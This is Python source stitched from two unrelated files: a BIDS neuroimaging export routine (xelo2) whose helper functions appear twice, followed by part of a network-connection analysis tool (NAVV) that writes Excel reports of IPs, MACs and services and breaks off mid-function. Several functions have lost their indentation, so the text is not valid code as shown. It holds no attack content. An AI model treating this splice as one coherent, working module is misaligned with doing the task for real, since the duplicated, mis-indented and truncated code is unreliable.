    return prepare_subset(db, run_id_sql, subset=subset)
def add_intended_for_topup(db, subset):
    """Return the ids of the topup runs that target any run in `subset`."""
    topups = []
    for run_id in subset['runs']:
        query = QSqlQuery(db['db'])
        query.prepare("SELECT run_id FROM intended_for WHERE target = :targetid")
        query.bindValue(':targetid', run_id)
        if not query.exec():
            raise SyntaxError(query.lastError().text())
        while query.next():
            topups.append(query.value('run_id'))
    return topups
def add_intended_for_elec(db, subset):
    """Electrodes also need the reference T1w images, so we add it here"""
    reference_t1w = []
    for run_id in subset['runs']:
        for rec in Run(db, id=run_id).list_recordings():
            electrodes = rec.electrodes
            if electrodes is None:
                continue
            t1w_id = electrodes.IntendedFor
            if t1w_id is not None:
                reference_t1w.append(t1w_id)
    return reference_t1w
def _make_bids_config(data_path):
d = {
"ignore": [
"INCONSISTENT_SUBJECTS", # different tasks
"INCONSISTENT_PARAMETERS", # different tasks
"SLICETIMING_ELEMENTS", # https://github.com/bids-standard/bids-validator/issues/1111
"MISSING_SESSION", # not all subjects have the same sessions
],
"warn": [],
"error": [],
"ignoredFiles": [
]
}
with (data_path / '.bids-validator-config.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def _make_README(data_path):
with (data_path / 'README').open('w') as f:
f.write('Converted with xelo2')
def _set_date_to_1900(base_date, datetime_of_interest):
if datetime_of_interest is None: # run.start_time is null
return datetime(1900, 1, 1, 0, 0, 0)
else:
return datetime.combine(
date(1900, 1, 1) + (datetime_of_interest.date() - base_date),
datetime_of_interest.time())
def _make_sess_name(sess):
if sess.name == 'MRI':
MagneticFieldStrength = sess.MagneticFieldStrength
if MagneticFieldStrength is None:
lg.warning(f'Please specify Magnetic Field Strength for {sess}')
sess_name = 'mri'
elif MagneticFieldStrength == '1.5T': # we cannot use 1.5 in session name
sess_name = 'mri'
else:
sess_name = MagneticFieldStrength.lower()
else:
sess_name = sess.name.lower()
return sess_name
def _add_intendedfor(db, bids_dir, intendedfor):
    """For every converted run, record its IntendedFor targets in the sidecar JSON."""
    for run_id, relative_path in intendedfor.items():
        # only keep targets that were actually converted into this dataset
        targets = set(find_intendedfor(db, run_id)) & set(intendedfor)
        if len(targets) == 0:
            continue
        fields = []
        for target_id in targets:
            target_file = intendedfor[target_id].relative_to(bids_dir)
            # remove sub- from the path (note the inconsistency between fieldmaps and T1w/elec)
            target_file = target_file.relative_to(target_file.parts[0])
            fields.append(str(target_file))
        json_file = replace_extension(bids_dir / relative_path, '.json')
        _add_intendedfor_to_json(json_file, fields)
def _add_intendedfor_to_json(json_file, fields):
if json_file.exists():
with json_file.open() as f:
sidecar = load(f)
else:
lg.warning('Adding IntendedFor to {json_file}, but this file does not exist')
sidecar = {}
sidecar['IntendedFor'] = fields
with json_file.open('w') as f:
dump(sidecar, f, indent=2)
def find_intendedfor(db, run_id):
    """Return the ids of all runs that `run_id` is intended for (intended_for table)."""
    query = QSqlQuery(db['db'])
    query.prepare("SELECT target FROM intended_for WHERE run_id = :runid")
    query.bindValue(':runid', run_id)
    if not query.exec():
        raise SyntaxError(query.lastError().text())
    targets = []
    while query.next():
        targets.append(query.value('target'))
    return targets
def remove_phase(bids_dir):
    """Delete every '*_phase.nii.gz' below `bids_dir`.

    I cannot specify phase.json so we get lots of errors when including phase.nii.gz
    https://github.com/bids-standard/bids-validator/issues/1074
    """
    for phase_file in bids_dir.rglob('*_phase.nii.gz'):
        phase_file.unlink()
def _find_columns(scans):
cols = []
for fields in scans:
for k in fields:
if k not in cols:
cols.append(k)
return cols
| from json import dump, load
from pathlib import Path
from copy import copy as c
from collections import defaultdict
from logging import getLogger
from datetime import date, datetime
from shutil import copy, rmtree
from bidso.utils import replace_extension
from PyQt5.QtSql import QSqlQuery
from ..api import list_subjects, Run
from .mri import convert_mri
from .ephys import convert_ephys
from .physio import convert_physio
from .events import convert_events
from .utils import rename_task, prepare_subset, add_extra_fields_to_json
from .templates import (
JSON_PARTICIPANTS,
JSON_SESSIONS,
)
# protocols
PROTOCOL_HEALTHY = [
'16-816',
]
lg = getLogger(__name__)
def create_bids(db, data_path, deface=True, subset=None, keep_phase=False):
    """Export (a subset of) the xelo2 database `db` as a BIDS tree at `data_path`.

    Any existing `data_path` is removed first. `subset` restricts the export to the
    listed subjects/sessions/runs (extended with their IntendedFor targets),
    `deface` is forwarded to the MRI conversion, and `keep_phase` keeps the
    *_phase.nii.gz images that are otherwise deleted.
    """
    if subset is not None:
        subset = add_intended_for(db, subset)
        subset_subj = set(subset['subjects'])
        subset_sess = set(subset['sessions'])
        subset_run = set(subset['runs'])
    data_path = Path(data_path)
    if data_path.exists():
        rmtree(data_path, ignore_errors=True)
    data_path.mkdir(parents=True, exist_ok=True)
    # the dataset_description.json is used by find_root, in some subscripts
    _make_dataset_description(data_path)
    intendedfor = {}
    scans_json = {}
    participants = []
    for subj in list_subjects(db):
        bids_name = {
            'sub': None,
            'ses': None,
            'task': None,
            'acq': None,
            'rec': None,
            'dir': None,
            'run': None,
            'recording': None,  # only for physiology
            }
        if subset is not None and subj.id not in subset_subj:
            continue
        # use relative date based on date_of_signature
        reference_dates = [p.date_of_signature for p in subj.list_protocols()]
        reference_dates = [date for date in reference_dates if date is not None]
        if len(reference_dates) == 0:
            lg.warning(f'You need to add at least one research protocol with dates for {subj.codes}')
            lg.info('Using date of the first task performed by the subject')
            reference_dates = [x.start_time for x in subj.list_sessions() if x.start_time is not None]
            if len(reference_dates):
                reference_date = min(reference_dates).date()
            else:
                # NOTE(review): this fallback is a datetime while the other branches
                # yield a date; subtracting date_of_birth below would then raise - confirm
                reference_date = datetime(2000, 1, 1, 12, 0, 0)  # if no task has dates, then use a random date
        else:
            reference_date = max(reference_dates)
        lg.info(f'Adding {subj.codes}')
        codes = subj.codes
        if len(codes) == 0:
            # use id if code is empty (fix: the f-prefix was missing, so the
            # literal text "id{subj.id}" became the subject code)
            code = f'id{subj.id}'
        else:
            code = codes[0]
        bids_name['sub'] = 'sub-' + code
        subj_path = data_path / bids_name['sub']
        subj_path.mkdir(parents=True, exist_ok=True)
        if subj.date_of_birth is None:
            lg.warning(f'You need to add date_of_birth to {subj.codes}')
            age = 'n/a'
        else:
            age = (reference_date - subj.date_of_birth).days // 365.2425
            age = f'{age:.0f}'
        patient_or_healthy = 'patient'
        for p in subj.list_protocols():
            if p.metc in PROTOCOL_HEALTHY:
                patient_or_healthy = 'healthy'
        participants.append({
            'participant_id': bids_name['sub'],
            'sex': subj.sex,
            'age': age,
            'group': patient_or_healthy,
            })
        sess_count = defaultdict(int)
        sess_files = []
        for sess in subj.list_sessions():
            sess_count[_make_sess_name(sess)] += 1  # also count the sessions which are not included
            if subset is not None and sess.id not in subset_sess:
                continue
            bids_name['ses'] = f'ses-{_make_sess_name(sess)}{sess_count[_make_sess_name(sess)]}'
            sess_path = subj_path / bids_name['ses']
            sess_path.mkdir(parents=True, exist_ok=True)
            lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]}')
            sess_files.append({
                'session_id': bids_name['ses'],
                'resection': 'n/a',
                'implantation': 'no',
                })
            if sess.name in ('IEMU', 'OR', 'CT'):
                sess_files[-1]['implantation'] = 'yes'
            run_count = defaultdict(int)
            run_files = []
            for run in sess.list_runs():
                run_count[run.task_name] += 1  # also count the runs which are not included
                if subset is not None and run.id not in subset_run:
                    continue
                if len(run.list_recordings()) == 0:
                    lg.warning(f'No recordings for {subj.codes}/{run.task_name}')
                    continue
                acquisition = get_bids_acquisition(run)
                bids_name['run'] = f'run-{run_count[run.task_name]}'
                if acquisition in ('ieeg', 'eeg', 'meg', 'func'):
                    bids_name['task'] = f'task-{rename_task(run.task_name)}'
                else:
                    bids_name['task'] = None
                mod_path = sess_path / acquisition
                mod_path.mkdir(parents=True, exist_ok=True)
                lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]} / {acquisition} / {bids_name["task"]} ({run})')
                data_name = None
                for rec in run.list_recordings():
                    # dir can only go with bold and epi modality
                    if rec.modality in ('bold', 'epi') and rec.PhaseEncodingDirection is not None:
                        bids_name['dir'] = 'dir-' + rec.PhaseEncodingDirection
                    else:
                        bids_name['dir'] = None
                    if rec.modality in ('bold', 'T1w', 'T2w', 'T2star', 'PD', 'FLAIR', 'angio', 'epi'):
                        data_name = convert_mri(run, rec, mod_path, c(bids_name), deface)
                    elif rec.modality in ('ieeg', 'eeg', 'meg'):
                        if run.duration is None:
                            lg.warning(f'You need to specify duration for {subj.codes}/{run}')
                            continue
                        data_name = convert_ephys(run, rec, mod_path, c(bids_name), intendedfor)
                    elif rec.modality == 'physio':
                        if data_name is None:
                            lg.warning('physio only works after another recording modality')
                        elif acquisition == 'fmap':
                            lg.info('physio was recorded but BIDS says that it should not be included in fmap')
                        else:
                            convert_physio(rec, mod_path, c(bids_name))
                    else:
                        lg.warning(f'Unknown modality {rec.modality} for {rec}')
                        continue
                    if data_name is not None and acquisition in ('ieeg', 'eeg', 'meg', 'func'):
                        convert_events(run, mod_path, c(bids_name))
                    if data_name is not None and rec.modality != 'physio':  # secondary modality
                        intendedfor[run.id] = data_name
                        fields = {
                            'filename': data_name,
                            'acq_time': _set_date_to_1900(reference_date, run.start_time).isoformat(timespec='seconds'),
                            }
                        run_files.append(add_extra_fields_to_json(run, fields, scans_json))
            if len(run_files) == 0:
                continue
            tsv_file = sess_path / f'{bids_name["sub"]}_{bids_name["ses"]}_scans.tsv'
            if run_files:
                _list_scans(tsv_file, c(run_files), sess_path)
        tsv_file = subj_path / f'{bids_name["sub"]}_sessions.tsv'
        if sess_files:
            _list_scans(tsv_file, sess_files, data_path)
            json_sessions = tsv_file.with_suffix('.json')
            copy(JSON_SESSIONS, json_sessions)  # https://github.com/bids-standard/bids-validator/issues/888
    # add IntendedFor for top_up scans
    _add_intendedfor(db, data_path, intendedfor)
    # remove phase because we get lots of warnings from BIDS
    if not keep_phase:
        remove_phase(data_path)
    # here the rest
    if len(scans_json) > 0:
        with (data_path / 'scans.json').open('w') as f:
            dump(scans_json, f, ensure_ascii=False, indent=' ')
    _make_README(data_path)
    tsv_file = data_path / 'participants.tsv'
    _list_scans(tsv_file, participants, data_path)
    json_participants = tsv_file.with_suffix('.json')
    copy(JSON_PARTICIPANTS, json_participants)
    _make_bids_config(data_path)
def _list_scans(tsv_file, scans, root_dir):
"""
Parameters
----------
"""
if 'filename' in scans[0]:
for scan in scans:
scan['filename'] = str(scan['filename'].relative_to(root_dir))
cols = _find_columns(scans)
with tsv_file.open('w') as f:
f.write('\t'.join(cols) + '\n')
for scan in scans:
values = []
for k in cols:
values.append(scan.get(k, 'n/a'))
f.write('\t'.join(values) + '\n')
def _make_dataset_description(data_path):
"""Generate general description of the dataset
Parameters
----------
data_path : Path
root BIDS directory
"""
d = {
"Name": data_path.name,
"BIDSVersion": "1.2.1",
"License": "CC0",
"Authors": [
"Giovanni Piantoni",
"Nick Ramsey",
],
"Acknowledgements": "",
"HowToAcknowledge": '',
"Funding": [
],
"ReferencesAndLinks": ["", ],
"DatasetDOI": ""
}
with (data_path / 'dataset_description.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def get_bids_acquisition(run):
    """Return the BIDS data-type folder for the first known modality in *run*.

    Raises ValueError when no recording has a recognized modality.
    """
    folder_of = {
        'ieeg': 'ieeg',
        'eeg': 'eeg',
        'meg': 'meg',
        'T1w': 'anat', 'T2w': 'anat', 'T2star': 'anat', 'FLAIR': 'anat',
        'PD': 'anat', 'angio': 'anat',
        'bold': 'func', 'phase': 'func',
        'epi': 'fmap',
        'ct': 'ct',
    }
    for recording in run.list_recordings():
        modality = recording.modality
        if modality in folder_of:
            return folder_of[modality]
    raise ValueError(f'I cannot determine BIDS folder for {repr(run)}')
def add_intended_for(db, subset):
    """Extend *subset* with the runs referenced as IntendedFor.

    Collects the reference T1w runs (for electrodes) and the topup runs, and
    merges them into the subset via an extra SQL condition.
    """
    referenced = add_intended_for_elec(db, subset) + add_intended_for_topup(db, subset)
    if not referenced:
        return subset
    run_id_sql = '`runs`.`id` in ({})'.format(', '.join(str(x) for x in referenced))
    return prepare_subset(db, run_id_sql, subset=subset)
def add_intended_for_topup(db, subset):
    """Add topup

    Collect the ids of runs whose `intended_for` target is one of the runs in
    *subset*, so that the topup scans themselves are exported as well.
    Raises SyntaxError when the SQL query fails.
    """
    topups = []
    for run_id in subset['runs']:
        query = QSqlQuery(db['db'])
        query.prepare("SELECT run_id FROM intended_for WHERE target = :targetid")
        query.bindValue(':targetid', run_id)
        if not query.exec():
            raise SyntaxError(query.lastError().text())
        while query.next():
            topups.append(query.value('run_id'))
    return topups
def add_intended_for_elec(db, subset):
    """Electrodes also need the reference T1w images, so we add it here"""
    t1w_ids = []
    for run_id in subset['runs']:
        for rec in Run(db, id=run_id).list_recordings():
            elec = rec.electrodes
            if elec is None:
                continue
            if elec.IntendedFor is not None:
                t1w_ids.append(elec.IntendedFor)
    return t1w_ids
def _make_bids_config(data_path):
d = {
"ignore": [
"INCONSISTENT_SUBJECTS", # different tasks
"INCONSISTENT_PARAMETERS", # different tasks
"SLICETIMING_ELEMENTS", # https://github.com/bids-standard/bids-validator/issues/1111
"MISSING_SESSION", # not all subjects have the same sessions
],
"warn": [],
"error": [],
"ignoredFiles": [
]
}
with (data_path / '.bids-validator-config.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def _make_README(data_path):
with (data_path / 'README').open('w') as f:
f.write('Converted with xelo2')
def _set_date_to_1900(base_date, datetime_of_interest):
if datetime_of_interest is None: # run.start_time is null
return datetime(1900, 1, 1, 0, 0, 0)
else:
return datetime.combine(
date(1900, 1, 1) + (datetime_of_interest.date() - base_date),
datetime_of_interest.time())
def _make_sess_name(sess):
if sess.name == 'MRI':
MagneticFieldStrength = sess.MagneticFieldStrength
if MagneticFieldStrength is None:
lg.warning(f'Please specify Magnetic Field Strength for {sess}')
sess_name = 'mri'
elif MagneticFieldStrength == '1.5T': # we cannot use 1.5 in session name
sess_name = 'mri'
else:
sess_name = MagneticFieldStrength.lower()
else:
sess_name = sess.name.lower()
return sess_name
def _add_intendedfor(db, bids_dir, intendedfor):
    """For each converted run, write its IntendedFor targets into the sidecar json."""
    for run_id, relative_path in intendedfor.items():
        # keep only the targets that were actually converted in this dataset
        targets = set(find_intendedfor(db, run_id)) & set(intendedfor)
        if not targets:
            continue
        fields = []
        for target_id in targets:
            target_file = intendedfor[target_id].relative_to(bids_dir)
            # remove sub- from the path (note the inconsistency between fieldmaps and T1w/elec)
            target_file = target_file.relative_to(target_file.parts[0])
            fields.append(str(target_file))
        json_file = replace_extension(bids_dir / relative_path, '.json')
        _add_intendedfor_to_json(json_file, fields)
def _add_intendedfor_to_json(json_file, fields):
if json_file.exists():
with json_file.open() as f:
sidecar = load(f)
else:
lg.warning('Adding IntendedFor to {json_file}, but this file does not exist')
sidecar = {}
sidecar['IntendedFor'] = fields
with json_file.open('w') as f:
dump(sidecar, f, indent=2)
def find_intendedfor(db, run_id):
    """Return ids of the target runs that *run_id* is intended for.

    Raises SyntaxError when the SQL query fails.
    """
    query = QSqlQuery(db['db'])
    query.prepare("SELECT target FROM intended_for WHERE run_id = :runid")
    query.bindValue(':runid', run_id)
    if not query.exec():
        raise SyntaxError(query.lastError().text())
    topups = []
    while query.next():
        topups.append(query.value('target'))
    return topups
def remove_phase(bids_dir):
    """I cannot specify phase.json so we get lots of errors when including phase.nii.gz
    https://github.com/bids-standard/bids-validator/issues/1074
    """
    for phase_file in bids_dir.rglob('*_phase.nii.gz'):
        phase_file.unlink()
def _find_columns(scans):
cols = []
for fields in scans:
for k in fields:
if k not in cols:
cols.append(k)
return cols
|
#!/usr/bin/env python3
# Copyright 2021 Battelle Energy Alliance, LLC
import os
import itertools
from collections import Counter
import socket
from copy import copy
import pkg_resources
import pickle
import string
import openpyxl
import openpyxl.styles
from openpyxl.worksheet.table import Table
import netaddr
from tqdm import tqdm
from navv import data_types
from navv import utilities
# Pickled lookup tables (services, conn_states) shipped with the package
DATA_PKL_FILE = pkg_resources.resource_filename(__name__, "data/data.pkl")
# Column headers of the generated Analysis sheet
COL_NAMES = [
    "Count",
    "Src_IP",
    "Src_Desc",
    "Dest_IP",
    "Dest_Desc",
    "Port",
    "Service",
    "Proto",
    "Conn_State",
    "Notes",
]
# Bold blue style applied to every header row
HEADER_STYLE = openpyxl.styles.NamedStyle(
    name="header_style",
    font=openpyxl.styles.Font(name="Calibri", size=11, bold=True),
    fill=openpyxl.styles.PatternFill("solid", fgColor="4286F4"),
)
# (fill, font) pairs used to color-code cells by address/service category.
# IPV6_CELL_COLOR is also reused for multicast/unassigned/broadcast addresses.
IPV6_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="FFFFFF"),
    openpyxl.styles.Font(name="Calibri", size=11, color="ff0000"),
)
EXTERNAL_NETWORK_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="030303"),
    openpyxl.styles.Font(name="Calibri", size=11, color="ffff00"),
)
INTERNAL_NETWORK_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ffff00"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ICMP_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ff33cc"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
UNKNOWN_EXTERNAL_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ffffff"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
# IPs whose reverse-DNS lookup already failed (appended in handle_ip;
# NOTE(review): never read back — looks vestigial, confirm before removing)
ALREADY_UNRESOLVED = list()
def get_workbook(file_name):
    """Create the blank Inventory and Segment sheets for data input into the tool"""
    if os.path.isfile(file_name):
        return openpyxl.load_workbook(file_name)
    wb = openpyxl.Workbook()
    inv_sheet = wb.active
    inv_sheet.title = "Inventory"
    seg_sheet = wb.create_sheet("Segments")
    # header row for each sheet
    for sheet, headers in ((inv_sheet, ("IP", "Name")),
                           (seg_sheet, ("Name", "Description", "CIDR"))):
        for col, header in enumerate(headers, start=1):
            sheet.cell(row=1, column=col, value=header).style = HEADER_STYLE
    return wb
@utilities.timeit
def get_inventory_data(ws, **kwargs):
    """Build {ip: InventoryItem} from the Inventory sheet (header row skipped)."""
    inventory = dict()
    for row in itertools.islice(ws.iter_rows(), 1, None):  # skip the header row
        ip_cell, name_cell = row[0], row[1]
        if not ip_cell.value or not name_cell.value:
            continue  # incomplete row
        inventory[ip_cell.value] = data_types.InventoryItem(
            ip=ip_cell.value,
            name=name_cell.value,
            color=(copy(ip_cell.fill), copy(ip_cell.font)),
        )
    return inventory
@utilities.timeit
def get_segments_data(ws):
    """Build the list of Segment objects from the Segments sheet.

    The returned list's final element is not a Segment: it is the combined
    list of every IP of every segment (used for fast membership tests).
    """
    segments = list()
    for row in itertools.islice(ws.iter_rows(), 1, None):  # skip the header row
        if not row[2].value:
            continue  # no CIDR -> not a usable segment
        segment = data_types.Segment(
            name=row[0].value,
            description=row[1].value,
            network=row[2].value,
            color=[copy(row[0].fill), copy(row[0].font)],
        )
        segments.append(segment)
    all_ips = []
    for segment in segments:
        all_ips.extend(segment.network)
    segments.append(all_ips)
    return segments
def get_package_data():
    """Load services and conn_states data into memory"""
    # the pickle stores the (services, conn_states) pair directly
    with open(DATA_PKL_FILE, "rb") as pkl_file:
        return pickle.load(pkl_file)
@utilities.timeit
def create_analysis_array(sort_input, **kwargs):
    """Turn tab-separated connection strings into AnalysisRowItem objects.

    Each element of *sort_input* is expected to be a tab-joined string of
    src_ip, dest_ip, port, proto, conn_state, mac (in that order, judging by
    the cells[] mapping below).  Returns (rows sorted by descending count,
    {mac: [private source IPs seen with that mac]}).
    """
    arr = list()
    mac_dict = dict()
    # sort by count and source IP
    counted = sorted(
        list(str(count) + "\t" + item for item, count in sorted(Counter(sort_input).items(), key=lambda x: x[0])),
        key=lambda x: int(x.split("\t")[0]),
        reverse=True,
    )
    for row in counted:
        cells = row.split("\t")
        arr.append(
            data_types.AnalysisRowItem(
                count=cells[0],
                src_ip=cells[1],
                dest_ip=cells[2],
                port=cells[3],
                proto=cells[4],
                conn=cells[5],
            )
        )
        # group private source IPs by MAC (cells[6]); str.split never yields
        # None, so the "is not None" guard only matters for empty strings
        if cells[6] is not None and cells[6] != "":
            if netaddr.IPAddress(cells[1]).is_private():
                if cells[6] not in mac_dict:
                    mac_dict[cells[6]] = [cells[1]]
                else:
                    if cells[1] not in mac_dict[cells[6]]:
                        mac_dict[cells[6]].append(cells[1])
    return arr, mac_dict
@utilities.timeit
def perform_analysis(
    wb,
    rows,
    services,
    conn_states,
    inventory,
    segments,
    dns_data,
    pkl_path,
    ext_IPs,
    unk_int_IPs,
    **kwargs,
):
    """Fill the Analysis sheet with one colored row per unique connection.

    Side effects: mutates each row in *rows* (desc/service/conn fields),
    updates *dns_data* (reverse-DNS cache, re-pickled to *pkl_path*) and the
    *ext_IPs* / *unk_int_IPs* sets discovered during lookups.
    """
    sheet = make_sheet(wb, "Analysis", idx=0)
    # header row (same values as COL_NAMES)
    sheet.append(
        [
            "Count",
            "Src_IP",
            "Src_Desc",
            "Dest_IP",
            "Dest_Desc",
            "Port",
            "Service",
            "Proto",
            "Conn_State",
            "Notes",
        ]
    )
    print("Performing analysis(including lookups). This may take a while:")
    for row_index, row in enumerate(tqdm(rows), start=2):  # row 1 is the header
        row.src_desc = handle_ip(row.src_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
        row.dest_desc = handle_ip(row.dest_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
        handle_service(row, services)
        # replace the bare state code with (code, styling/description tuple)
        row.conn = (row.conn, conn_states[row.conn])
        write_row_to_sheet(row, row_index, sheet)
    tab = Table(displayName="AnalysisTable", ref=f"A1:J{len(rows)+1}")
    sheet.add_table(tab)
    # pickle the lookupdata for future use
    with open(pkl_path, "wb") as pkl:
        pickle.dump(dns_data, pkl)
def write_row_to_sheet(row, row_index, sheet):
    """Write one analysis row into *sheet* at *row_index*, applying cell colors."""

    def _styled(column, value, fill_font):
        # write a value and apply its (fill, font) pair
        cell = sheet.cell(row=row_index, column=column, value=value)
        cell.fill = fill_font[0]
        cell.font = fill_font[1]

    sheet.cell(row=row_index, column=1, value=int(row.count))
    _styled(2, row.src_ip, row.src_desc[1])
    _styled(3, row.src_desc[0], row.src_desc[1])
    _styled(4, row.dest_ip, row.dest_desc[1])
    _styled(5, row.dest_desc[0], row.dest_desc[1])
    sheet.cell(row=row_index, column=6, value=int(row.port))
    _styled(7, row.service[0], row.service[1])
    sheet.cell(row=row_index, column=8, value=row.proto)
    _styled(9, row.conn[0], row.conn[1])
    # placeholder for notes cell
    sheet.cell(row=row_index, column=10, value="")
def handle_service(row, services):
    """Fill row.service; for ICMP the 'port' actually carries the ICMP type.

    services layout: { port: { proto: (name, (fill, font)) } }
    """
    known = services.get(row.port, {})
    if row.proto in known:
        row.service = known[row.proto]
        return
    if row.proto != "icmp":
        row.service = ("unknown service", UNKNOWN_EXTERNAL_CELL_COLOR)
        return
    # classify ICMP version by the source address family
    if netaddr.valid_ipv4(row.src_ip):
        row.proto = "ICMPv4"
        service_dict = data_types.icmp4_types
    else:
        row.proto = "ICMPv6"
        service_dict = data_types.icmp6_types
    name = service_dict.get(row.port, "unknown icmp")
    row.service = (name, ICMP_CELL_COLOR)
def handle_ip(ip_to_check, dns_data, inventory, segments, ext_IPs, unk_int_IPs):
    """Function take IP Address and uses collected dns_data, inventory, and segment information to give IP Addresses in analysis context.
    Priority flow:
    * DHCP Broadcasting
    * Multicast
    * Within Segments identified
    * Within Inventory, not within an Identified Segment
    * Private Network
    * External (Public IP space) or Internet
    This will capture the name description and the color coding identified within the worksheet.
    Returns a (description, (fill, font)) tuple.
    """
    #
    if ip_to_check == str("0.0.0.0"):
        desc_to_change = (
            "Unassigned IPv4",
            IPV6_CELL_COLOR,
        )
    elif ip_to_check == str("255.255.255.255"):
        desc_to_change = (
            "IPv4 All Subnet Broadcast",
            IPV6_CELL_COLOR,
        )
    elif netaddr.valid_ipv6(ip_to_check) or netaddr.IPAddress(ip_to_check).is_multicast():
        # bug fix: nested double quotes inside a double-quoted f-string are a
        # SyntaxError before Python 3.12 — use single quotes inside instead
        desc_to_change = (
            f"{'IPV6' if netaddr.valid_ipv6(ip_to_check) else 'IPV4'}{'_Multicast' if netaddr.IPAddress(ip_to_check).is_multicast() else ''}",
            IPV6_CELL_COLOR,
        )
    elif ip_to_check in segments[len(segments) - 1]:  # last element = all segment IPs
        for segment in segments[:-1]:
            if ip_to_check not in segment.network:
                continue
            if ip_to_check in dns_data:
                desc_to_change = (dns_data[ip_to_check], segment.color)
            # NOTE(review): when the IP is not in the inventory, the else below
            # overwrites the dns_data description set just above — confirm intended
            if ip_to_check in inventory:
                desc_to_change = (inventory[ip_to_check].name, segment.color)
            else:
                desc_to_change = (
                    f"Unknown device in {segment.name} network",
                    segment.color,
                )
                unk_int_IPs.add(ip_to_check)
    elif ip_to_check in inventory:
        desc_to_change = (inventory[ip_to_check].name, inventory[ip_to_check].color)
    elif netaddr.IPAddress(ip_to_check).is_private():
        if ip_to_check in dns_data:
            desc_to_change = (dns_data[ip_to_check], INTERNAL_NETWORK_CELL_COLOR)
        else:
            desc_to_change = ("Unknown Internal address", INTERNAL_NETWORK_CELL_COLOR)
            unk_int_IPs.add(ip_to_check)
    else:
        ext_IPs.add(ip_to_check)
        if ip_to_check in dns_data:
            resolution = dns_data[ip_to_check]
        else:
            try:
                resolution = socket.gethostbyaddr(ip_to_check)[0]
            except socket.herror:
                resolution = "Unresolved external address"
                ALREADY_UNRESOLVED.append(ip_to_check)
            finally:
                dns_data[ip_to_check] = resolution  # cache for future calls
        desc_to_change = (resolution, EXTERNAL_NETWORK_CELL_COLOR)
    return desc_to_change
def write_conn_states_sheet(conn_states, wb):
    """Write the Conn_States reference sheet: colored state code + description.

    conn_states values are indexed as [0]=fill, [1]=font, [2]=description.
    """
    ws = make_sheet(wb, "Conn_States", idx=8)
    ws.append(["State", "Description"])
    for row_num, (state, info) in enumerate(conn_states.items(), start=2):
        fill, font, description = info[0], info[1], info[2]
        for col, value in (("A", state), ("B", description)):
            cell = ws[f"{col}{row_num}"]
            cell.value = value
            cell.fill = fill
            cell.font = font
    auto_adjust_width(ws)
def write_macs_sheet(mac_dict, wb):
    """Fill spreadsheet with MAC address -> IP address translation with manufacturer information"""
    macs_sheet = make_sheet(wb, "MACs", idx=4)
    macs_sheet.append(["MAC", "Manufacturer", "IPs"])
    for row_index, mac in enumerate(mac_dict, start=2):
        macs_sheet[f"A{row_index}"].value = mac
        # look up the manufacturer(s) in the OUI registry
        try:
            eui = netaddr.EUI(mac)
            oui = eui.oui
            orgs = [oui.registration(i).org for i in range(oui.reg_count)]
        except netaddr.core.NotRegisteredError:
            orgs = ["Not a registered manufacturer"]
        except netaddr.core.AddrFormatError:
            orgs = [f"Bad MAC address {mac}"]
        except Exception:
            # catch-all so one malformed entry cannot abort the whole sheet
            orgs = ["Unspecified MAC error"]
        macs_sheet[f"B{row_index}"].value = "\n".join(orgs)
        ip_list_cell = macs_sheet[f"C{row_index}"]
        ip_list_cell.alignment = openpyxl.styles.Alignment(wrap_text=True)
        num_ips = len(mac_dict[mac])
        # show at most 10 IPs per MAC to keep the cell readable
        if num_ips > 10:
            display_list = mac_dict[mac][:10]
            display_list.append(f"Displaying 10 IPs of {num_ips}")
            ip_list_cell.value = "\n".join(display_list)
        else:
            ip_list_cell.value = "\n".join(mac_dict[mac][:10])
        # ~15 points per text line, capped at 11 lines (10 IPs + overflow note)
        macs_sheet.row_dimensions[row_index].height = min(num_ips, 11) * 15
        if row_index % 2 == 0:  # zebra-stripe even rows
            for cell in macs_sheet[f"{row_index}:{row_index}"]:
                cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
    auto_adjust_width(macs_sheet)
    macs_sheet.column_dimensions["C"].width = 39 * 1.2
def write_externals_sheet(IPs, wb):
    """List all observed external IPs on their own sheet, zebra-striped."""
    ext_sheet = make_sheet(wb, "Externals", idx=5)
    ext_sheet.append(["External IP"])
    row_index = 2
    for ip in sorted(IPs):
        cell = ext_sheet[f"A{row_index}"]
        cell.value = ip
        if row_index % 2 == 0:  # stripe even rows
            cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
        row_index += 1
    auto_adjust_width(ext_sheet)
def write_unknown_internals_sheet(IPs, wb):
    """List internal IPs that could not be matched to inventory or segments."""
    # NOTE: sheet name 'Unkown_Internals' is misspelled but kept as-is,
    # since consumers may reference the sheet by that exact name
    int_sheet = make_sheet(wb, "Unkown_Internals", idx=6)
    int_sheet.append(["Unknown Internal IP"])
    for row_index, ip in enumerate(sorted(IPs), start=2):
        cell = int_sheet[f"A{row_index}"]
        cell.value = ip
        if row_index % 2 == 0:  # stripe even rows
            cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
    auto_adjust_width(int_sheet)
def write_stats_sheet(wb, stats):
    """Write capture statistics to the Stats sheet.

    NOTE: mutates *stats* (pops 'Length of Capture time').  Column letters
    come from ascii_uppercase, so at most 25 further stats fit (B..Z).
    """
    stats_sheet = make_sheet(wb, "Stats", idx=7)
    stats_sheet.append(["Length of Capture time"] + [column for column in stats if column != "Length of Capture time"])
    stats_sheet["A2"] = stats.pop("Length of Capture time")
    for col_index, stat in enumerate(stats, 1):
        stats_sheet[f"{string.ascii_uppercase[col_index]}2"].value = stats[stat]
    auto_adjust_width(stats_sheet)
def make_sheet(wb, sheet_name, idx=None):
    """Create the sheet if it doesn't already exist otherwise remove it and recreate it"""
    for existing_name in list(wb.sheetnames):
        if existing_name == sheet_name:
